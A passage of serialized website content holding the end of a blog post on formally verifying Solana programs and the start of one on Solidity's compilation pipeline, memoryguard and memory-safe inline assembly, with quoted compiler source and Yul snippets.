extremely large SMT expressions containing nested 32-byte comparisons and binary searches on a vector.",{"type":25,"tag":38,"props":32818,"children":32819},{},[32820,32822,32827,32829,32834,32836,32841,32843,32848,32850,32855,32857,32862],{"type":31,"value":32821},"However, in most cases the properties we are interested in do not require specific search algorithms for the ",{"type":25,"tag":82,"props":32823,"children":32825},{"className":32824},[],[32826],{"type":31,"value":906},{"type":31,"value":32828}," or a 32-byte ",{"type":25,"tag":82,"props":32830,"children":32832},{"className":32831},[],[32833],{"type":31,"value":25358},{"type":31,"value":32835},". Instead, our tool can substitute in ",{"type":25,"tag":64,"props":32837,"children":32838},{},[32839],{"type":31,"value":32840},"cheaper",{"type":31,"value":32842}," types and functions, such as a 4-byte ",{"type":25,"tag":82,"props":32844,"children":32846},{"className":32845},[],[32847],{"type":31,"value":25358},{"type":31,"value":32849}," struct and a fixed-size, array-backed ",{"type":25,"tag":82,"props":32851,"children":32853},{"className":32852},[],[32854],{"type":31,"value":906},{"type":31,"value":32856}," implementation. These structures are API-compatible with the native SDK and the changes are functionally invisible to the Solana program we are verifying. However, the generated expressions are ",{"type":25,"tag":64,"props":32858,"children":32859},{},[32860],{"type":31,"value":32861},"much",{"type":31,"value":32863}," simpler and we find that these techniques can greatly accelerate the speed of model-checking.",{"type":25,"tag":38,"props":32865,"children":32866},{},[32867],{"type":31,"value":32868},"It is of key importance that these SDK modifications do not introduce any unsoundness into the model-checking process. We are actively exploring how to do this effectively.",{"type":25,"tag":606,"props":32870,"children":32872},{"id":32871},"runtime-environment",[32873],{"type":31,"value":32874},"Runtime Environment",{"type":25,"tag":38,"props":32876,"children":32877},{},[32878],{"type":31,"value":32879},"While these techniques are quite capable of verifying pure-Rust constructs such as the logical flow of the program, use of Rust types, etc... other aspects of the Solana runtime environment are more difficult to verify.",{"type":25,"tag":38,"props":32881,"children":32882},{},[32883],{"type":31,"value":32884},"For example, a program may resize accounts to store variable amounts of data. These types of custom serialization algorithms require specialized techniques to verify account invariants. For example, a bug with account serialization could undermine \"correct\" account logic.",{"type":25,"tag":38,"props":32886,"children":32887},{},[32888],{"type":31,"value":32889},"Another example is cross-program invocation (CPI). While account data cannot be changed by other programs, when you invoke other instructions it becomes more difficult to verify instruction invariants. An instruction three levels down could fail and cause the whole transaction to revert.",{"type":25,"tag":26,"props":32891,"children":32893},{"id":32892},"conclusion",[32894],{"type":31,"value":22907},{"type":25,"tag":38,"props":32896,"children":32897},{},[32898],{"type":31,"value":32899},"Computer security is far from being a solved problem. Formal verification is a great technique but it is not a magic bullet. While it can help you verify the correctness of your program it won't catch 100% of the bugs. It won't stop you from specifying the wrong invariants or forgetting things, and it can't help you if there is a bug outside of the scope of the model — for example in the runtime or consensus layer.",{"type":25,"tag":38,"props":32901,"children":32902},{},[32903],{"type":31,"value":32904},"Disclaimer out of the way, we believe that formal verification can still be a very useful tool when applied correctly. We've demonstrated that it is possible to automatically prove invariants about Solana programs in a tractable and user-friendly way.",{"type":25,"tag":22753,"props":32906,"children":32907},{},[],{"type":25,"tag":38,"props":32909,"children":32910},{},[32911],{"type":25,"tag":64,"props":32912,"children":32913},{},[32914,32916,32921,32922,32926],{"type":31,"value":32915},"We're excited to keep pushing this research forward and enhance the security of the whole Solana ecosystem. Our tools are still in development but we're interested in working with other teams. If you have a Solana program you want to get formally verified, give us a shout! Fill out ",{"type":25,"tag":162,"props":32917,"children":32919},{"href":22836,"rel":32918},[166],[32920],{"type":31,"value":22840},{"type":31,"value":22842},{"type":25,"tag":162,"props":32923,"children":32924},{"href":22845},[32925],{"type":31,"value":22848},{"type":31,"value":179},{"type":25,"tag":9316,"props":32928,"children":32929},{},[32930],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":32932},[32933,32939,32943,32948,32954,32958],{"id":22910,"depth":6769,"text":22913,"children":32934},[32935,32936,32937,32938],{"id":22916,"depth":6778,"text":22919},{"id":22984,"depth":6778,"text":22987},{"id":23864,"depth":6778,"text":23867},{"id":23904,"depth":6778,"text":23907},{"id":23957,"depth":6769,"text":32940,"children":32941},"Specification: How can we describe what we want our program to do?",[32942],{"id":24071,"depth":6778,"text":24074},{"id":25430,"depth":6769,"text":25433,"children":32944},[32945,32946,32947],{"id":26092,"depth":6778,"text":26095},{"id":26377,"depth":6778,"text":26380},{"id":26521,"depth":6778,"text":26524},{"id":26662,"depth":6769,"text":26665,"children":32949},[32950,32951,32952,32953],{"id":26733,"depth":6778,"text":26736},{"id":28596,"depth":6778,"text":28599},{"id":29398,"depth":6778,"text":26725},{"id":31924,"depth":6778,"text":26730},{"id":32764,"depth":6769,"text":32767,"children":32955},[32956,32957],{"id":32770,"depth":6778,"text":32773},{"id":32871,"depth":6778,"text":32874},{"id":32892,"depth":6769,"text":22907},"content:blog:2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs",{"_path":32963,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":32964,"description":32965,"author":9670,"image":32966,"date":32968,"isFeatured":16,"onBlogPage":16,"tags":32969,"body":32971,"_type":6798,"_id":34391,"_source":6800,"_file":34392,"_stem":34393,"_extension":6803},"/blog/2023-07-28-solidity-compilers-memory-safety","Solidity Compilers: Memory Safety","An exploration into the Solidity compilation pipeline, optimization assumptions, and how it all relates back to memory-safe assembly.",{"src":32967,"height":17580,"width":17580},"/posts/solidity-compilers-memory-safety/header.jpg","2023-07-28",[8422,32970],"compiler",{"type":22,"children":32972,"toc":34382},[32973,32979,33015,33027,33033,33055,33068,33216,33237,33242,33263,33268,33276,33281,33286,33291,33297,33316,33321,33342,33405,33418,33448,33468,33495,33500,33513,33518,33523,33536,33567,33590,33744,33762,33813,33832,33857,33862,33868,33895,33915,33943,33948,33970,33989,33997,34008,34013,34029,34286,34294,34299,34303,34308,34313,34378],{"type":25,"tag":26,"props":32974,"children":32976},{"id":32975},"introduction",[32977],{"type":31,"value":32978},"Introduction",{"type":25,"tag":38,"props":32980,"children":32981},{},[32982,32984,32990,32991,32995,32997,33004,33006,33013],{"type":31,"value":32983},"What does ",{"type":25,"tag":82,"props":32985,"children":32987},{"className":32986},[],[32988],{"type":31,"value":32989},"memory-safe",{"type":31,"value":10409},{"type":25,"tag":64,"props":32992,"children":32993},{},[32994],{"type":31,"value":13244},{"type":31,"value":32996}," mean? What guarantees does Solidity expose when you're dealing with inline assembly? The documentation ",{"type":25,"tag":162,"props":32998,"children":33001},{"href":32999,"rel":33000},"https://docs.soliditylang.org/en/v0.8.20/assembly.html#memory-safety",[166],[33002],{"type":31,"value":33003},"presents some requirements",{"type":31,"value":33005},", but is production code that ",{"type":25,"tag":162,"props":33007,"children":33010},{"href":33008,"rel":33009},"https://github.com/Vectorized/solady/blob/main/src/utils/SafeTransferLib.sol#L165-L166",[166],[33011],{"type":31,"value":33012},"violates these requirements",{"type":31,"value":33014}," necessarily unsafe?",{"type":25,"tag":38,"props":33016,"children":33017},{},[33018,33020,33025],{"type":31,"value":33019},"In this blog post, we present a high-level overview of the Solidity compiler. We'll also dive into the optimization pipeline, language lawyering, and present an argument for what ",{"type":25,"tag":64,"props":33021,"children":33022},{},[33023],{"type":31,"value":33024},"memory-safety",{"type":31,"value":33026}," actually means.",{"type":25,"tag":26,"props":33028,"children":33030},{"id":33029},"compiler-pipeline",[33031],{"type":31,"value":33032},"Compiler Pipeline",{"type":25,"tag":38,"props":33034,"children":33035},{},[33036,33038,33045,33047,33054],{"type":31,"value":33037},"For brevity's sake, we'll only cover the YUL IR Solidity compilation pipeline ",{"type":25,"tag":162,"props":33039,"children":33042},{"href":33040,"rel":33041},"https://blog.soliditylang.org/2022/03/16/solidity-0.8.13-release-announcement/",[166],[33043],{"type":31,"value":33044},"released in v0.8.13",{"type":31,"value":33046},". Compilation happens ",{"type":25,"tag":162,"props":33048,"children":33051},{"href":33049,"rel":33050},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libsolidity/interface/CompilerStack.cpp#L684",[166],[33052],{"type":31,"value":33053},"in two main steps",{"type":31,"value":1472},{"type":25,"tag":6711,"props":33056,"children":33057},{},[33058,33063],{"type":25,"tag":2043,"props":33059,"children":33060},{},[33061],{"type":31,"value":33062},"Solidity to YUL IR",{"type":25,"tag":2043,"props":33064,"children":33065},{},[33066],{"type":31,"value":33067},"YUL IR to EVM opcodes",{"type":25,"tag":206,"props":33069,"children":33073},{"className":33070,"code":33071,"language":33072,"meta":7,"style":7},"language-cpp shiki shiki-themes slack-dark","    if (m_viaIR || m_generateIR || m_generateEwasm)\n        generateIR(*contract);\n    if (m_generateEvmBytecode)\n    {\n        if (m_viaIR)\n            generateEVMFromIR(*contract);\n        else\n            compileContract(*contract, otherCompilers);\n    }\n","cpp",[33074],{"type":25,"tag":82,"props":33075,"children":33076},{"__ignoreMap":7},[33077,33107,33128,33140,33148,33160,33180,33188,33209],{"type":25,"tag":216,"props":33078,"children":33079},{"class":6922,"line":6923},[33080,33084,33089,33093,33098,33102],{"type":25,"tag":216,"props":33081,"children":33082},{"style":6973},[33083],{"type":31,"value":16235},{"type":25,"tag":216,"props":33085,"children":33086},{"style":6964},[33087],{"type":31,"value":33088}," (m_viaIR ",{"type":25,"tag":216,"props":33090,"children":33091},{"style":6953},[33092],{"type":31,"value":26364},{"type":25,"tag":216,"props":33094,"children":33095},{"style":6964},[33096],{"type":31,"value":33097}," m_generateIR ",{"type":25,"tag":216,"props":33099,"children":33100},{"style":6953},[33101],{"type":31,"value":26364},{"type":25,"tag":216,"props":33103,"children":33104},{"style":6964},[33105],{"type":31,"value":33106}," m_generateEwasm)\n",{"type":25,"tag":216,"props":33108,"children":33109},{"class":6922,"line":6769},[33110,33115,33119,33123],{"type":25,"tag":216,"props":33111,"children":33112},{"style":7047},[33113],{"type":31,"value":33114},"        generateIR",{"type":25,"tag":216,"props":33116,"children":33117},{"style":6964},[33118],{"type":31,"value":1850},{"type":25,"tag":216,"props":33120,"children":33121},{"style":6953},[33122],{"type":31,"value":8519},{"type":25,"tag":216,"props":33124,"children":33125},{"style":6964},[33126],{"type":31,"value":33127},"contract);\n",{"type":25,"tag":216,"props":33129,"children":33130},{"class":6922,"line":6778},[33131,33135],{"type":25,"tag":216,"props":33132,"children":33133},{"style":6973},[33134],{"type":31,"value":16235},{"type":25,"tag":216,"props":33136,"children":33137},{"style":6964},[33138],{"type":31,"value":33139}," (m_generateEvmBytecode)\n",{"type":25,"tag":216,"props":33141,"children":33142},{"class":6922,"line":7005},[33143],{"type":25,"tag":216,"props":33144,"children":33145},{"style":6964},[33146],{"type":31,"value":33147},"    {\n",{"type":25,"tag":216,"props":33149,"children":33150},{"class":6922,"line":7110},[33151,33155],{"type":25,"tag":216,"props":33152,"children":33153},{"style":6973},[33154],{"type":31,"value":7222},{"type":25,"tag":216,"props":33156,"children":33157},{"style":6964},[33158],{"type":31,"value":33159}," (m_viaIR)\n",{"type":25,"tag":216,"props":33161,"children":33162},{"class":6922,"line":7216},[33163,33168,33172,33176],{"type":25,"tag":216,"props":33164,"children":33165},{"style":7047},[33166],{"type":31,"value":33167},"            generateEVMFromIR",{"type":25,"tag":216,"props":33169,"children":33170},{"style":6964},[33171],{"type":31,"value":1850},{"type":25,"tag":216,"props":33173,"children":33174},{"style":6953},[33175],{"type":31,"value":8519},{"type":25,"tag":216,"props":33177,"children":33178},{"style":6964},[33179],{"type":31,"value":33127},{"type":25,"tag":216,"props":33181,"children":33182},{"class":6922,"line":7244},[33183],{"type":25,"tag":216,"props":33184,"children":33185},{"style":6973},[33186],{"type":31,"value":33187},"        else\n",{"type":25,"tag":216,"props":33189,"children":33190},{"class":6922,"line":7257},[33191,33196,33200,33204],{"type":25,"tag":216,"props":33192,"children":33193},{"style":7047},[33194],{"type":31,"value":33195},"            compileContract",{"type":25,"tag":216,"props":33197,"children":33198},{"style":6964},[33199],{"type":31,"value":1850},{"type":25,"tag":216,"props":33201,"children":33202},{"style":6953},[33203],{"type":31,"value":8519},{"type":25,"tag":216,"props":33205,"children":33206},{"style":6964},[33207],{"type":31,"value":33208},"contract, otherCompilers);\n",{"type":25,"tag":216,"props":33210,"children":33211},{"class":6922,"line":7275},[33212],{"type":25,"tag":216,"props":33213,"children":33214},{"style":6964},[33215],{"type":31,"value":7311},{"type":25,"tag":38,"props":33217,"children":33218},{},[33219,33221,33228,33229,33236],{"type":31,"value":33220},"Each step applies its own set of optimizations. The entrypoints are located at ",{"type":25,"tag":162,"props":33222,"children":33225},{"href":33223,"rel":33224},"https://github.com/ethereum/solidity/blob/fd9ac9abed2049a4b8134d39e178275c8aad75b6/libyul/YulStack.cpp#L92",[166],[33226],{"type":31,"value":33227},"YulStack::optimize",{"type":31,"value":1307},{"type":25,"tag":162,"props":33230,"children":33233},{"href":33231,"rel":33232},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libevmasm/Assembly.cpp#L336",[166],[33234],{"type":31,"value":33235},"Assembly::optimize",{"type":31,"value":179},{"type":25,"tag":38,"props":33238,"children":33239},{},[33240],{"type":31,"value":33241},"In total, there are four steps.",{"type":25,"tag":6711,"props":33243,"children":33244},{},[33245,33249,33254,33258],{"type":25,"tag":2043,"props":33246,"children":33247},{},[33248],{"type":31,"value":33062},{"type":25,"tag":2043,"props":33250,"children":33251},{},[33252],{"type":31,"value":33253},"Optimization of YUL IR",{"type":25,"tag":2043,"props":33255,"children":33256},{},[33257],{"type":31,"value":33067},{"type":25,"tag":2043,"props":33259,"children":33260},{},[33261],{"type":31,"value":33262},"Optimization of EVM opcodes",{"type":25,"tag":38,"props":33264,"children":33265},{},[33266],{"type":31,"value":33267},"As mentioned in the v0.8.13 release post, the YUL optimizer is able to perform much more complex optimizations. Compared to Solidity, YUL contains detailed semantic information and is simpler for optimization passes to reason about than opcodes.",{"type":25,"tag":34,"props":33269,"children":33270},{},[33271],{"type":25,"tag":38,"props":33272,"children":33273},{},[33274],{"type":31,"value":33275},"The performance of the new pipeline is not yet always superior to the old one, but it can do much higher-level optimization across functions, so please try it out and give us feedback!",{"type":25,"tag":38,"props":33277,"children":33278},{},[33279],{"type":31,"value":33280},"Importantly, each step happens in isolation and retains no information about the previous stage.",{"type":25,"tag":38,"props":33282,"children":33283},{},[33284],{"type":31,"value":33285},"The optimizer cannot change the behavior of the generated IR. This means we don't need to worry about potentially tricky optimizations such as reordering of functions, removal of unused assigns, or moving stack variables to memory.",{"type":25,"tag":38,"props":33287,"children":33288},{},[33289],{"type":31,"value":33290},"When it comes to safety, we need only to consider the IR generation. But what exactly are the guarantees here?",{"type":25,"tag":26,"props":33292,"children":33294},{"id":33293},"guarantees",[33295],{"type":31,"value":33296},"Guarantees",{"type":25,"tag":38,"props":33298,"children":33299},{},[33300,33301,33308,33310,33315],{"type":31,"value":474},{"type":25,"tag":162,"props":33302,"children":33305},{"href":33303,"rel":33304},"https://docs.soliditylang.org/en/v0.8.20/internals/layout_in_memory.html",[166],[33306],{"type":31,"value":33307},"Solidity memory layout",{"type":31,"value":33309}," exists only at the time of YUL IR generation. The YUL optimizer and later steps has ",{"type":25,"tag":64,"props":33311,"children":33312},{},[33313],{"type":31,"value":33314},"no information about this layout",{"type":31,"value":179},{"type":25,"tag":38,"props":33317,"children":33318},{},[33319],{"type":31,"value":33320},"What if the optimizer wants to use memory for optimization passes? How does it know what slots are used by the IR generator?",{"type":25,"tag":38,"props":33322,"children":33323},{},[33324,33326,33332,33334,33340],{"type":31,"value":33325},"Introducing ",{"type":25,"tag":82,"props":33327,"children":33329},{"className":33328},[],[33330],{"type":31,"value":33331},"memoryguard",{"type":31,"value":33333},". If you've ever looked at the output of ",{"type":25,"tag":82,"props":33335,"children":33337},{"className":33336},[],[33338],{"type":31,"value":33339},"solc --ir",{"type":31,"value":33341},", this call may be familiar. It's used to initialize the free-memory pointer.",{"type":25,"tag":206,"props":33343,"children":33345},{"className":8423,"code":33344,"language":8422,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    store(64, memoryguard(0x80))\n",[33346],{"type":25,"tag":82,"props":33347,"children":33348},{"__ignoreMap":7},[33349,33367],{"type":25,"tag":216,"props":33350,"children":33351},{"class":6922,"line":6923},[33352,33357,33362],{"type":25,"tag":216,"props":33353,"children":33354},{"style":6927},[33355],{"type":31,"value":33356},"    /// @src 0:26:371  \"contract ",{"type":25,"tag":216,"props":33358,"children":33359},{"style":6936},[33360],{"type":31,"value":33361},"XXX",{"type":25,"tag":216,"props":33363,"children":33364},{"style":6927},[33365],{"type":31,"value":33366}," {...\"\n",{"type":25,"tag":216,"props":33368,"children":33369},{"class":6922,"line":6769},[33370,33375,33379,33384,33388,33392,33396,33401],{"type":25,"tag":216,"props":33371,"children":33372},{"style":7047},[33373],{"type":31,"value":33374},"    store",{"type":25,"tag":216,"props":33376,"children":33377},{"style":6964},[33378],{"type":31,"value":1850},{"type":25,"tag":216,"props":33380,"children":33381},{"style":6989},[33382],{"type":31,"value":33383},"64",{"type":25,"tag":216,"props":33385,"children":33386},{"style":6964},[33387],{"type":31,"value":7026},{"type":25,"tag":216,"props":33389,"children":33390},{"style":7047},[33391],{"type":31,"value":33331},{"type":25,"tag":216,"props":33393,"children":33394},{"style":6964},[33395],{"type":31,"value":1850},{"type":25,"tag":216,"props":33397,"children":33398},{"style":6989},[33399],{"type":31,"value":33400},"0x80",{"type":25,"tag":216,"props":33402,"children":33403},{"style":6964},[33404],{"type":31,"value":23672},{"type":25,"tag":38,"props":33406,"children":33407},{},[33408,33410,33417],{"type":31,"value":33409},"From ",{"type":25,"tag":162,"props":33411,"children":33414},{"href":33412,"rel":33413},"https://solidity.readthedocs.io/en/latest/yul.html#memoryguard",[166],[33415],{"type":31,"value":33416},"the documentation",{"type":31,"value":1867},{"type":25,"tag":34,"props":33419,"children":33420},{},[33421],{"type":25,"tag":38,"props":33422,"children":33423},{},[33424,33426,33432,33434,33440,33442,33447],{"type":31,"value":33425},"The caller of ",{"type":25,"tag":82,"props":33427,"children":33429},{"className":33428},[],[33430],{"type":31,"value":33431},"let ptr := memoryguard(size)",{"type":31,"value":33433}," (where size has to be a literal number) promises that they only use memory in either the range ",{"type":25,"tag":82,"props":33435,"children":33437},{"className":33436},[],[33438],{"type":31,"value":33439},"[0, size)",{"type":31,"value":33441}," or the unbounded range starting at ",{"type":25,"tag":82,"props":33443,"children":33445},{"className":33444},[],[33446],{"type":31,"value":17906},{"type":31,"value":179},{"type":25,"tag":38,"props":33449,"children":33450},{},[33451,33453,33458,33460,33466],{"type":31,"value":33452},"For example, if the YUL optimizer needs 32 bytes of memory, it can have ",{"type":25,"tag":82,"props":33454,"children":33456},{"className":33455},[],[33457],{"type":31,"value":33331},{"type":31,"value":33459}," return ",{"type":25,"tag":82,"props":33461,"children":33463},{"className":33462},[],[33464],{"type":31,"value":33465},"size + 32",{"type":31,"value":33467},". The optimizer gets a guaranteed region of memory which will not be touched!",{"type":25,"tag":38,"props":33469,"children":33470},{},[33471,33473,33480,33482,33487,33489,33494],{"type":31,"value":33472},"An example of this optimization in practice ",{"type":25,"tag":162,"props":33474,"children":33477},{"href":33475,"rel":33476},"https://github.com/ethereum/solidity/blob/1633e367c90aed7a6a14d84e2c288e6a8ab93304/libyul/optimiser/StackLimitEvader.cpp",[166],[33478],{"type":31,"value":33479},"is the StackLimitEvader",{"type":31,"value":33481},", which moves variables from the stack into memory. Incidentally, this is also currently the ",{"type":25,"tag":64,"props":33483,"children":33484},{},[33485],{"type":31,"value":33486},"only",{"type":31,"value":33488}," optimization pass that relies on the semantic information communicated by ",{"type":25,"tag":82,"props":33490,"children":33492},{"className":33491},[],[33493],{"type":31,"value":33331},{"type":31,"value":179},{"type":25,"tag":38,"props":33496,"children":33497},{},[33498],{"type":31,"value":33499},"The modular design between different compiler stages also means that we're not tied down into any particular memory layout. Does it make sense to waste an entire memory word on the free memory pointer? Maybe not for some applications.",{"type":25,"tag":38,"props":33501,"children":33502},{},[33503,33505,33511],{"type":31,"value":33504},"Fear not, for we can remove this pointer entirely and call ",{"type":25,"tag":82,"props":33506,"children":33508},{"className":33507},[],[33509],{"type":31,"value":33510},"memoryguard(0x60)",{"type":31,"value":33512}," instead. The rest of the pipeline will still work.",{"type":25,"tag":26,"props":33514,"children":33515},{"id":33024},[33516],{"type":31,"value":33517},"Memory Safety",{"type":25,"tag":38,"props":33519,"children":33520},{},[33521],{"type":31,"value":33522},"So what does memory safety mean?",{"type":25,"tag":38,"props":33524,"children":33525},{},[33526,33528,33534],{"type":31,"value":33527},"The Solidity documentation provides ",{"type":25,"tag":162,"props":33529,"children":33531},{"href":32999,"rel":33530},[166],[33532],{"type":31,"value":33533},"a set of constraints",{"type":31,"value":33535},", not a definition.",{"type":25,"tag":34,"props":33537,"children":33538},{},[33539,33544],{"type":25,"tag":38,"props":33540,"children":33541},{},[33542],{"type":31,"value":33543},"In particular, a memory-safe assembly block may only access the following memory ranges:",{"type":25,"tag":6711,"props":33545,"children":33546},{},[33547,33552,33557,33562],{"type":25,"tag":2043,"props":33548,"children":33549},{},[33550],{"type":31,"value":33551},"Memory allocated by yourself using a mechanism like the allocate function described above.",{"type":25,"tag":2043,"props":33553,"children":33554},{},[33555],{"type":31,"value":33556},"Memory allocated by Solidity, e.g. memory within the bounds of a memory array you reference.",{"type":25,"tag":2043,"props":33558,"children":33559},{},[33560],{"type":31,"value":33561},"The scratch space between memory offset 0 and 64 mentioned above.",{"type":25,"tag":2043,"props":33563,"children":33564},{},[33565],{"type":31,"value":33566},"Temporary memory that is located after the value of the free memory pointer at the beginning of the assembly\nblock, i.e. memory that is “allocated” at the free memory pointer without updating the free memory pointer.",{"type":25,"tag":38,"props":33568,"children":33569},{},[33570,33572,33579,33589],{"type":31,"value":33571},"Looking to the compiler, it appears the presence of memory-unsafe assembly ",{"type":25,"tag":162,"props":33573,"children":33576},{"href":33574,"rel":33575},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGenerator.cpp#L210",[166],[33577],{"type":31,"value":33578},"removes the memory guard",{"type":25,"tag":19431,"props":33580,"children":33581},{},[33582],{"type":25,"tag":162,"props":33583,"children":33587},{"href":33584,"ariaDescribedBy":33585,"dataFootnoteRef":7,"id":33586},"#user-content-fn-1",[19438],"user-content-fnref-1",[33588],{"type":31,"value":184},{"type":31,"value":179},{"type":25,"tag":206,"props":33591,"children":33593},{"className":33070,"code":33592,"language":33072,"meta":7,"style":7},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n\nstring IRGenerator::memoryInit(bool _useMemoryGuard)\n{\n // This function should be called at the beginning of the EVM call frame\n // and thus can assume all memory to be zero, including the contents of\n // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n return\n  Whiskers{\n   _useMemoryGuard ?\n   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\" :\n   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n  }\n",[33594],{"type":25,"tag":82,"props":33595,"children":33596},{"__ignoreMap":7},[33597,33605,33613,33620,33656,33663,33671,33679,33687,33695,33703,33716,33729,33737],{"type":25,"tag":216,"props":33598,"children":33599},{"class":6922,"line":6923},[33600],{"type":25,"tag":216,"props":33601,"children":33602},{"style":6927},[33603],{"type":31,"value":33604},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n",{"type":25,"tag":216,"props":33606,"children":33607},{"class":6922,"line":6769},[33608],{"type":25,"tag":216,"props":33609,"children":33610},{"style":6927},[33611],{"type":31,"value":33612},"// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n",{"type":25,"tag":216,"props":33614,"children":33615},{"class":6922,"line":6778},[33616],{"type":25,"tag":216,"props":33617,"children":33618},{"emptyLinePlaceholder":16},[33619],{"type":31,"value":7642},{"type":25,"tag":216,"props":33621,"children":33622},{"class":6922,"line":7005},[33623,33628,33633,33638,33642,33647,33652],{"type":25,"tag":216,"props":33624,"children":33625},{"style":7375},[33626],{"type":31,"value":33627},"string",{"type":25,"tag":216,"props":33629,"children":33630},{"style":6964},[33631],{"type":31,"value":33632}," IRGenerator::",{"type":25,"tag":216,"props":33634,"children":33635},{"style":7047},[33636],{"type":31,"value":33637},"memoryInit",{"type":25,"tag":216,"props":33639,"children":33640},{"style":6964},[33641],{"type":31,"value":1850},{"type":25,"tag":216,"props":33643,"children":33644},{"style":6936},[33645],{"type":31,"value":33646},"bool",{"type":25,"tag":216,"props":33648,"children":33649},{"style":6947},[33650],{"type":31,"value":33651}," _useMemoryGuard",{"type":25,"tag":216,"props":33653,"children":33654},{"style":6964},[33655],{"type":31,"value":7107},{"type":25,"tag":216,"props":33657,"children":33658},{"class":6922,"line":7110},[33659],{"type":25,"tag":216,"props":33660,"children":33661},{"style":6964},[33662],{"type":31,"value":14836},{"type":25,"tag":216,"props":33664,"children":33665},{"class":6922,"line":7216},[33666],{"type":25,"tag":216,"props":33667,"children":33668},{"style":6927},[33669],{"type":31,"value":33670}," // This function should be called at the beginning of the EVM call frame\n",{"type":25,"tag":216,"props":33672,"children":33673},{"class":6922,"line":7244},[33674],{"type":25,"tag":216,"props":33675,"children":33676},{"style":6927},[33677],{"type":31,"value":33678}," // and thus can assume all memory to be zero, including the contents of\n",{"type":25,"tag":216,"props":33680,"children":33681},{"class":6922,"line":7257},[33682],{"type":25,"tag":216,"props":33683,"children":33684},{"style":6927},[33685],{"type":31,"value":33686}," // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n",{"type":25,"tag":216,"props":33688,"children":33689},{"class":6922,"line":7275},[33690],{"type":25,"tag":216,"props":33691,"children":33692},{"style":6973},[33693],{"type":31,"value":33694}," return\n",{"type":25,"tag":216,"props":33696,"children":33697},{"class":6922,"line":7296},[33698],{"type":25,"tag":216,"props":33699,"children":33700},{"style":6964},[33701],{"type":31,"value":33702},"  Whiskers{\n",{"type":25,"tag":216,"props":33704,"children":33705},{"class":6922,"line":7305},[33706,33711],{"type":25,"tag":216,"props":33707,"children":33708},{"style":6964},[33709],{"type":31,"value":33710},"   _useMemoryGuard ",{"type":25,"tag":216,"props":33712,"children":33713},{"style":6953},[33714],{"type":31,"value":33715},"?\n",{"type":25,"tag":216,"props":33717,"children":33718},{"class":6922,"line":7557},[33719,33724],{"type":25,"tag":216,"props":33720,"children":33721},{"style":8205},[33722],{"type":31,"value":33723},"   \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\"",{"type":25,"tag":216,"props":33725,"children":33726},{"style":6953},[33727],{"type":31,"value":33728}," :\n",{"type":25,"tag":216,"props":33730,"children":33731},{"class":6922,"line":7574},[33732],{"type":25,"tag":216,"props":33733,"children":33734},{"style":8205},[33735],{"type":31,"value":33736},"   \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n",{"type":25,"tag":216,"props":33738,"children":33739},{"class":6922,"line":7591},[33740],{"type":25,"tag":216,"props":33741,"children":33742},{"style":6964},[33743],{"type":31,"value":9823},{"type":25,"tag":38,"props":33745,"children":33746},{},[33747,33752,33754,33760],{"type":25,"tag":82,"props":33748,"children":33750},{"className":33749},[],[33751],{"type":31,"value":33339},{"type":31,"value":33753}," will now no longer have ",{"type":25,"tag":82,"props":33755,"children":33757},{"className":33756},[],[33758],{"type":31,"value":33759},"memoryguard(0x80)",{"type":31,"value":33761}," as expected.",{"type":25,"tag":206,"props":33763,"children":33765},{"className":8423,"code":33764,"language":8422,"meta":7,"style":7},"    /// @src 0:26:371  \"contract XXX {...\"\n    mstore(64, 128)\n",[33766],{"type":25,"tag":82,"props":33767,"children":33768},{"__ignoreMap":7},[33769,33784],{"type":25,"tag":216,"props":33770,"children":33771},{"class":6922,"line":6923},[33772,33776,33780],{"type":25,"tag":216,"props":33773,"children":33774},{"style":6927},[33775],{"type":31,"value":33356},{"type":25,"tag":216,"props":33777,"children":33778},{"style":6936},[33779],{"type":31,"value":33361},{"type":25,"tag":216,"props":33781,"children":33782},{"style":6927},[33783],{"type":31,"value":33366},{"type":25,"tag":216,"props":33785,"children":33786},{"class":6922,"line":6769},[33787,33792,33796,33800,33804,33809],{"type":25,"tag":216,"props":33788,"children":33789},{"style":7047},[33790],{"type":31,"value":33791},"    mstore",{"type":25,"tag":216,"props":33793,"children":33794},{"style":6964},[33795],{"type":31,"value":1850},{"type":25,"tag":216,"props":33797,"children":33798},{"style":6989},[33799],{"type":31,"value":33383},{"type":25,"tag":216,"props":33801,"children":33802},{"style":6964},[33803],{"type":31,"value":7026},{"type":25,"tag":216,"props":33805,"children":33806},{"style":6989},[33807],{"type":31,"value":33808},"128",{"type":25,"tag":216,"props":33810,"children":33811},{"style":6964},[33812],{"type":31,"value":7107},{"type":25,"tag":38,"props":33814,"children":33815},{},[33816,33818,33823,33825,33830],{"type":31,"value":33817},"Semantically, the absence of ",{"type":25,"tag":82,"props":33819,"children":33821},{"className":33820},[],[33822],{"type":31,"value":33331},{"type":31,"value":33824}," means that the IR generator is telling the optimizer that it cannot guarantee the ",{"type":25,"tag":82,"props":33826,"children":33828},{"className":33827},[],[33829],{"type":31,"value":33331},{"type":31,"value":33831}," 